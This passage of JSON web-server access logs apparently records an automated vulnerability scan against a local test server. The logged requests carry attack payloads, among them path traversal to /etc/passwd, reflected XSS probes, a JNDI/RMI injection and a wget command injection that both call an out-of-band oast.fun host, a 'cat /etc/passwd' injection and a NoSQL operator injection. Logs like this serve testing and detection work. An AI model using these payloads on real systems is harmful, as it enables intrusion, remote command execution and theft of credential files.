HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.211","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/XUI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install/page_start.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=domain-check-profile&domain=test.foo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.088","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.084","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.233","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.092","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22org.apache.xbean.propertyeditor.JndiConverter\x22,\x0D\x0A \x22AsText\x22:\x22rmi://c9v8h8gsmpv8c1qg07h08g16hk15dqtdz.oast.fun/exploit\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.088","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/XUI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.077","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Forms/rpAuth_1?id=
HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.106","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.224","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/elementor/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.104","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"newUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2Fc9v8h8gsmpv8c1qg07h061xuizx7c3ios.oast.fun%3B%60%3B%23&password=asd&lang_select=en","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/login.php?user=admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/canal/config/1/1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /errors.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?client_id=1&redirect=https://example.com&action=nf_oauth_connect HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /qvisdvr/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:49 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crx/de/index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.202","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.well-known/acme-challenge/%3C%3fxml%20version=%221.0%22%3f%3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%3Ealert%28document.domain%26%23x29%3B%3C/x:script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /node_modules/../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.004","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /KeepAlive.jsp?stamp=16170297%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sfiler/Login.action HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ws/v1/cluster/info HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/w3-total-cache/pub/minify.php?file=yygpKbDS1y9Ky9TLSy0uLi3Wyy9KB3NLKkqUM4CyxUDpxKzECr30_Pz0nNTEgsxiveT8XAA.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.190","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"op=login&username=;`cat /etc/passwd`&password=\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"127.0.0.1/module/login/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ws/v1/cluster/apps/new-application HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Gemfile.lock HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.195","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login?redir=http://www.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"{\x22code\x22: {\x22$gt\x22: 0}, \x22password\x22: \x22SuperStrongPassword1\x22, \x22passwordConfirmation\x22: \x22SuperStrongPassword1\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/auth/reset-password HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api_smartapp/storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/admin/cores?wt=json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /password.jsn HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /equipbid/storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /+CSCOE+/session_password.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mrtg/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.193","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /goforms/menu HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MRTG/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:50 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 